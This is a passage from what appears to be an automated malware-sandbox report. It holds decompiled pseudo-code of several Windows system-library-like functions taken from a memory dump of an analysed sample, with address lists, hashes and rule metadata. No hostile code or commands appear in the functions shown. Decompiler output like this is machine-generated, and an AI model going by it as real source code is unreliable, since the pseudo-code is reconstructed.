						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x1741664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E017AE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x1741668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E017E51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x174166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E01792AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E01776600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E01792C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E0177EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E01792AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E01792C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E01792ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E017BD0D1(_t62);
				goto L28;
			}





















                                                                              0x01792990
                                                                              0x01792992
                                                                              0x01792997
                                                                              0x017929a3
                                                                              0x017929a6
                                                                              0x017929ab
                                                                              0x017929ad
                                                                              0x017929b2
                                                                              0x017d5c80
                                                                              0x017929b8
                                                                              0x017929b8
                                                                              0x017929bb
                                                                              0x017929c0
                                                                              0x017929c5
                                                                              0x017929c6
                                                                              0x017929c6
                                                                              0x017929cb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017929cd
                                                                              0x017929d0
                                                                              0x017929d9
                                                                              0x017929db
                                                                              0x017929dd
                                                                              0x01792a7f
                                                                              0x01792a84
                                                                              0x01792a87
                                                                              0x01792a89
                                                                              0x017d5ca1
                                                                              0x017d5ca3
                                                                              0x00000000
                                                                              0x01792a8f
                                                                              0x01792a8f
                                                                              0x00000000
                                                                              0x01792a8f
                                                                              0x00000000
                                                                              0x017929e3
                                                                              0x017929e3
                                                                              0x017929e3
                                                                              0x00000000
                                                                              0x017929e3
                                                                              0x017929dd
                                                                              0x00000000
                                                                              0x017929db
                                                                              0x017929e6
                                                                              0x017929e9
                                                                              0x017929eb
                                                                              0x017929ed
                                                                              0x017929f3
                                                                              0x017929f5
                                                                              0x017929f8
                                                                              0x017929fa
                                                                              0x01792a97
                                                                              0x01792a9a
                                                                              0x01792a9d
                                                                              0x01792add
                                                                              0x00000000
                                                                              0x01792a9f
                                                                              0x01792aa2
                                                                              0x01792aa5
                                                                              0x01792aa8
                                                                              0x01792aab
                                                                              0x017d5cab
                                                                              0x017d5caf
                                                                              0x017d5cc5
                                                                              0x017d5cda
                                                                              0x017d5cdc
                                                                              0x017d5cdf
                                                                              0x017d5ce5
                                                                              0x00000000
                                                                              0x017d5ceb
                                                                              0x017d5ced
                                                                              0x017d5cee
                                                                              0x00000000
                                                                              0x017d5cee
                                                                              0x017d5cb1
                                                                              0x017d5cb4
                                                                              0x017d5cb9
                                                                              0x017d5cbb
                                                                              0x00000000
                                                                              0x017d5cbd
                                                                              0x017d5cbd
                                                                              0x00000000
                                                                              0x017d5cbd
                                                                              0x017d5cbb
                                                                              0x01792ab1
                                                                              0x01792ab1
                                                                              0x01792ac4
                                                                              0x01792ac6
                                                                              0x01792ac6
                                                                              0x00000000
                                                                              0x01792ac6
                                                                              0x01792aab
                                                                              0x00000000
                                                                              0x01792a00
                                                                              0x01792a09
                                                                              0x01792a0e
                                                                              0x01792a21
                                                                              0x01792a24
                                                                              0x01792a35
                                                                              0x01792a3a
                                                                              0x01792a3d
                                                                              0x01792a42
                                                                              0x01792a59
                                                                              0x01792a59
                                                                              0x01792a5c
                                                                              0x01792a5f
                                                                              0x01792a5f
                                                                              0x017929fa
                                                                              0x017929f3
                                                                              0x01792a64
                                                                              0x01792a64
                                                                              0x01792a6b
                                                                              0x01792a6b
                                                                              0x01792a6d
                                                                              0x01792a72
                                                                              0x00000000

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e906a3dfbf8e42db305e3fe3b2c94f0307b1618126f7d2a4a621e41fd2a81dee
                                                                              • Instruction ID: f3bdebeba0ed458049e496f32be292459f62e0fb0834aa39417da619e7ca7ba2
                                                                              • Opcode Fuzzy Hash: e906a3dfbf8e42db305e3fe3b2c94f0307b1618126f7d2a4a621e41fd2a81dee
                                                                              • Instruction Fuzzy Hash: AC515B7290020AEFDF25EF59D880ADEFBB5FF58310F148155ED04AB225C7399A56CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01794BAD Relevance: .1, Instructions: 131COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 85%
                                                                              			E01794BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x185d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E0176CC50(_t86);
					L11:
					return E017AB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x1858504
				E01782280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E017AFA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E017AB0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L01784620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E0176CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x1858504
								E0177FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E01794F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                                                              0x01794bad
                                                                              0x01794bbf
                                                                              0x01794bc2
                                                                              0x01794bc6
                                                                              0x01794bcd
                                                                              0x01794bd9
                                                                              0x017d67fe
                                                                              0x017d6800
                                                                              0x01794ccc
                                                                              0x01794ccd
                                                                              0x01794cb7
                                                                              0x01794cc9
                                                                              0x01794cc9
                                                                              0x01794bdf
                                                                              0x01794be5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01794beb
                                                                              0x01794bef
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01794bf5
                                                                              0x01794bf9
                                                                              0x01794c06
                                                                              0x01794c0b
                                                                              0x01794c17
                                                                              0x01794c1c
                                                                              0x01794c1f
                                                                              0x01794c25
                                                                              0x01794c33
                                                                              0x01794c3d
                                                                              0x01794c40
                                                                              0x01794c43
                                                                              0x01794c47
                                                                              0x01794c4d
                                                                              0x01794c53
                                                                              0x01794c54
                                                                              0x01794c55
                                                                              0x01794c56
                                                                              0x01794c5b
                                                                              0x01794c5c
                                                                              0x01794c63
                                                                              0x01794c6b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d6776
                                                                              0x017d6784
                                                                              0x017d6784
                                                                              0x017d679f
                                                                              0x017d67a7
                                                                              0x017d67af
                                                                              0x017d67ce
                                                                              0x00000000
                                                                              0x017d67b1
                                                                              0x017d67b7
                                                                              0x017d67b8
                                                                              0x017d67c1
                                                                              0x017d67d3
                                                                              0x017d67d9
                                                                              0x017d67dd
                                                                              0x01794c94
                                                                              0x01794c94
                                                                              0x01794c98
                                                                              0x01794c9c
                                                                              0x01794ca3
                                                                              0x017d67f4
                                                                              0x017d67f4
                                                                              0x01794cb5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01794cb5
                                                                              0x01794c79
                                                                              0x01794c7e
                                                                              0x01794c89
                                                                              0x01794c8b
                                                                              0x01794c8f
                                                                              0x01794c8f
                                                                              0x00000000
                                                                              0x01794c89
                                                                              0x017d67c3
                                                                              0x00000000
                                                                              0x017d67c3
                                                                              0x017d67af
                                                                              0x01794c73
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ed1840bc0b164a9e4077d2cdba4cb59fe48dcf322841d898259d383ec70fa32e
                                                                              • Instruction ID: d45a27921d020ef9a30ecd697011d4dcbb56217977909439490890fb566d11ad
                                                                              • Opcode Fuzzy Hash: ed1840bc0b164a9e4077d2cdba4cb59fe48dcf322841d898259d383ec70fa32e
                                                                              • Instruction Fuzzy Hash: 3A41C031A4022D9FCF21EF68CA44BEAF7B4EF45710F0100A5E909AB245EB349E85CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01794D3B Relevance: .1, Instructions: 131COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 78%
                                                                              			E01794D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x185d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E017AFA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x1857bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E017AB0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L01784620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E0176CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E017AB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E017AF380(_t67 + 0xc, 0x1745138, 0x10) == 0) {
								 *0x18560d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E01794F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E01794E70(0x18586b0, 0x1795690, 0, 0) != 0) {
					_t46 = E0176CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                                                              0x01794d3b
                                                                              0x01794d4d
                                                                              0x01794d53
                                                                              0x01794d58
                                                                              0x01794d65
                                                                              0x01794d6c
                                                                              0x01794d71
                                                                              0x01794d77
                                                                              0x01794d7f
                                                                              0x01794d8c
                                                                              0x01794d8e
                                                                              0x01794dad
                                                                              0x01794db0
                                                                              0x01794db7
                                                                              0x01794db8
                                                                              0x01794db9
                                                                              0x01794dba
                                                                              0x01794dbb
                                                                              0x01794dc1
                                                                              0x01794dc8
                                                                              0x01794dcc
                                                                              0x01794dd5
                                                                              0x01794dde
                                                                              0x01794ddf
                                                                              0x01794de0
                                                                              0x01794de1
                                                                              0x01794de6
                                                                              0x01794de7
                                                                              0x01794de9
                                                                              0x01794df3
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d6c7c
                                                                              0x017d6c8a
                                                                              0x017d6c8a
                                                                              0x017d6c9d
                                                                              0x017d6ca7
                                                                              0x017d6cac
                                                                              0x017d6cb2
                                                                              0x017d6cb9
                                                                              0x00000000
                                                                              0x017d6cbf
                                                                              0x017d6cbf
                                                                              0x00000000
                                                                              0x017d6cbf
                                                                              0x017d6cb9
                                                                              0x01794dfb
                                                                              0x017d6ccf
                                                                              0x017d6cd3
                                                                              0x01794e32
                                                                              0x01794e39
                                                                              0x017d6ce0
                                                                              0x017d6cf2
                                                                              0x017d6cf2
                                                                              0x017d6ce0
                                                                              0x01794e3f
                                                                              0x01794e41
                                                                              0x01794e51
                                                                              0x01794e51
                                                                              0x01794e03
                                                                              0x01794e03
                                                                              0x01794e09
                                                                              0x01794e0f
                                                                              0x01794e57
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01794e1b
                                                                              0x01794e30
                                                                              0x01794e5b
                                                                              0x01794e5b
                                                                              0x00000000
                                                                              0x01794e30
                                                                              0x01794e11
                                                                              0x01794e11
                                                                              0x01794e16
                                                                              0x00000000
                                                                              0x01794e16
                                                                              0x01794e01
                                                                              0x00000000
                                                                              0x01794e01
                                                                              0x01794da5
                                                                              0x017d6c6b
                                                                              0x00000000
                                                                              0x01794dab
                                                                              0x01794dab
                                                                              0x00000000
                                                                              0x01794dab

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e739e0c4f8abc7bf97aa25f8274a38f1eb75713f59d49e0212139f84b9d4db63
                                                                              • Instruction ID: 45a3f2f6940483e4881bef9f64404f21bfd9de247ee8bd0f27b3679ae3369284
                                                                              • Opcode Fuzzy Hash: e739e0c4f8abc7bf97aa25f8274a38f1eb75713f59d49e0212139f84b9d4db63
                                                                              • Instruction Fuzzy Hash: 3041E271A443189FEF32DF18DD84FAAF7B9EB48610F00009AE94A97285D774ED49CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01778A0A Relevance: .1, Instructions: 120COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 94%
                                                                              			E01778A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x185d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E017AB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E0177E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x1741180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E01791DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E017A3C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E01778999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                                                              0x01778a0a
                                                                              0x01778a1c
                                                                              0x01778a23
                                                                              0x01778a2e
                                                                              0x01778a30
                                                                              0x01778a36
                                                                              0x01778a3c
                                                                              0x01778a3e
                                                                              0x01778a4a
                                                                              0x01778a52
                                                                              0x01778a9c
                                                                              0x01778aae
                                                                              0x01778a58
                                                                              0x01778a5e
                                                                              0x01778a6a
                                                                              0x01778a6f
                                                                              0x01778a75
                                                                              0x01778a7d
                                                                              0x01778a85
                                                                              0x01778a86
                                                                              0x01778a89
                                                                              0x01778a93
                                                                              0x01778a99
                                                                              0x01778a9b
                                                                              0x00000000
                                                                              0x01778aaf
                                                                              0x01778abe
                                                                              0x01778ac3
                                                                              0x01778acb
                                                                              0x01778ad7
                                                                              0x01778ae0
                                                                              0x01778af1
                                                                              0x00000000
                                                                              0x01778af1
                                                                              0x01778acd
                                                                              0x01778ad5
                                                                              0x01778afb
                                                                              0x01778afd
                                                                              0x01778aff
                                                                              0x01778b07
                                                                              0x01778b22
                                                                              0x01778b24
                                                                              0x01778b2a
                                                                              0x01778b2e
                                                                              0x01778b3f
                                                                              0x01778b78
                                                                              0x01778b41
                                                                              0x01778b52
                                                                              0x01778b54
                                                                              0x01778b5c
                                                                              0x01778b74
                                                                              0x01778b74
                                                                              0x01778b5c
                                                                              0x01778b3f
                                                                              0x01778b5e
                                                                              0x01778b61
                                                                              0x01778b64
                                                                              0x01778b64
                                                                              0x01778b6c
                                                                              0x01778b6c
                                                                              0x01778b11
                                                                              0x017c9cd5
                                                                              0x017c9cd5
                                                                              0x01778b17
                                                                              0x01778b1a
                                                                              0x01778b1a
                                                                              0x00000000
                                                                              0x01778ad5
                                                                              0x01778a89

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 63153aa0fbd93af6754117ed1705ca3f534da7ced422ac6db50dee861655e798
                                                                              • Instruction ID: 93aba25fa3420c1d8f2dfeac66c8bf16850ca44ec84fbcdf344676f668fc4ae7
                                                                              • Opcode Fuzzy Hash: 63153aa0fbd93af6754117ed1705ca3f534da7ced422ac6db50dee861655e798
                                                                              • Instruction Fuzzy Hash: E04171B0A402299BDF24DF59CC8CAB9F7B8EB54300F1146EAD91997252E7709E80CF61
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0182AA16 Relevance: .1, Instructions: 120COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0182AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E0182ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E0182AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E0182AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E0180CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L017877F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E01787D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0182131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E0180CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}



















                                                                              0x0182aa1f
                                                                              0x0182aa21
                                                                              0x0182aa23
                                                                              0x0182aa2b
                                                                              0x0182aa30
                                                                              0x0182aa36
                                                                              0x0182aa39
                                                                              0x0182aa42
                                                                              0x0182aa75
                                                                              0x0182aa7a
                                                                              0x0182aa7c
                                                                              0x0182aa7c
                                                                              0x0182aa88
                                                                              0x0182aa8a
                                                                              0x0182aa8f
                                                                              0x0182ab02
                                                                              0x0182ab04
                                                                              0x0182aa99
                                                                              0x0182aaa8
                                                                              0x0182aaaf
                                                                              0x0182aab3
                                                                              0x0182aacc
                                                                              0x0182aad1
                                                                              0x0182aad6
                                                                              0x0182aae0
                                                                              0x0182aaf3
                                                                              0x0182aaf9
                                                                              0x0182aafe
                                                                              0x0182aafe
                                                                              0x0182aaf3
                                                                              0x0182aad6
                                                                              0x0182aab3
                                                                              0x0182ab07
                                                                              0x0182ab0a
                                                                              0x0182ab11
                                                                              0x0182ab23
                                                                              0x0182ab13
                                                                              0x0182ab1c
                                                                              0x0182ab1c
                                                                              0x0182ab2b
                                                                              0x0182ab44
                                                                              0x0182ab44
                                                                              0x0182ab51
                                                                              0x0182ab51
                                                                              0x0182aa44
                                                                              0x0182aa47
                                                                              0x0182aa4c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0182aa5a
                                                                              0x0182aa64
                                                                              0x0182aa72
                                                                              0x00000000
                                                                              0x0182aa66
                                                                              0x0182aa66
                                                                              0x0182aa68
                                                                              0x0182aa6a
                                                                              0x00000000
                                                                              0x0182aa6a

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                              • Instruction ID: 12db09c80b8802d5915f622f19c18511c34bdff2adc3be6c56f8d9b634b60407
                                                                              • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
